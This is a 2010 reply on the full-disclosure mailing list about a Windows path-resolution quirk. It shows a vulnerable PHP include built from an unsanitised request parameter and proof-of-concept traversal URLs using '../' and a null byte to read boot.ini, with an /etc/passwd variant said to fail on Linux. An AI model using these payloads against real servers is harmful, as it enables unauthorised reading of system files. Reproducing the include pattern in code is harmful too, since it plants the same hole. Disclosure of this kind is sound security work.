Date: Thu, 8 Jul 2010 12:37:06 +0100
From: Juan Galiana <jgaliana@...il.com>
To: Vipul Agarwal <vipul@...tygeeks.com>
Cc: full-disclosure@...ts.grok.org.uk
Subject: Re: Windows XP bug

This "feature" is useful to exploit path traversal in windows
environments through web applications.

In this case (I saw it plenty of times):

<?php require_once("help/help_".$_GET['lang'] .".php"); ?>

You can exploit it in windows with this PoC:

http://server/file.php?a=/../../../../../../boot.ini%00

because help/help_/../../../../../../boot.ini exists for windows and
the non-existing help_ directory is not breaking the instruction.

Otherwise, in linux is not possible to perform this kind of attacks
due we can't reference non-existing directories

$ ls -l noexist/../
ls: cannot access noexist/../: No such file or directory

An attack like http://server/file.php?a=/../../../../../../etc/passwd%00
won't work

Good approach!

Best Regards,